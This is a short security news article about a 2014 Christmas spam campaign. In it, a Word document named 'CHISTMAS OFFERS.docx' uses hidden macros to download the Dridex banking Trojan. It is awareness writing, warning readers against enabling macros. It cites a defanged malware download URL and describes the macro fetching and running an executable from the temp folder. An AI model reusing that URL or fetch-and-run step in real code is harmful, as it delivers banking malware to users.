Fake Christmas offers by Santa infect PCs with banking Malware

THIS SEASON, SANTA’S GOT “CHRISTMAS OFFERS” AND A VIRUS OR TWO IN STORE FOR YOU

‘It’s the season to be jolly and to infect a few hundred PC’s with a nasty virus too while you’re at it!

Spammers are taking advantage of the Christmas season to infect computers all over the world by emailing you a tempting word document file with the name “CHISTMAS OFFERS.docx”. With shoppers on the hunt for the best deals this holiday in terms of gifts, who wouldn’t be tempted to open such a file!

The email recipients who opened the Word document found it blank and it required macros enabling. While Microsoft usually has macros disabled, people are so enthusiastic to see those offers that they clicked on the enable macros button and got infected.

What Microsoft’s macros do is they allow you to create scripts that simply automate some simple document tasks such as the copy and paste option. However, macros can be quite a security risk because they can also be used for other activities which could be quite malicious in nature.

While the spammers who emailed the infected files actually had several macros created, you cannot see them because they were password enabled. However, you can make use of the OfficeMalScanenr tool to extract the macros code and open it in any text software. The code with which the macros are written is Visual Basic for Applications and it has the ability to download just about any file for any external URL.

By enabling content or macros, you would be enabling the code to start downloading just about anything it was written to download.

Why do people download such files? It’s called Social Engineering. It is designed to convince you to open the file by making it look absolutely innocent.

If you were one of those who trusted the document and opened it, here’s what happens:

The enabled macros remotely download a file from the URL hxxp://jasoncurtis.co.uk/js/bin.exe and then run it from your temp folder. What you download onto your PC is a banking Trojan known as Dridex which has already been recognized by Malwarebytes.

While this method is not very high-tech, it has been working recently using spam emails to get the unsuspecting victims to download it. Those who used some proper Anti Exploit premium survived the spam email unscathed because they were made aware of the danger before opening the file.

So while you all avoid the classic spam email that you know carries a virus, be also very aware of emails that carry seeming harmless Microsoft Office documents.

Source: http://hackread.com/santas-fake-christmas-offers-infect-pcs-with-banking-malware/

Permanent link to this article: https://www.darknessgate.com/2014/12/25/fake-christmas-offers-by-santa-infect-pcs-with-banking-malware/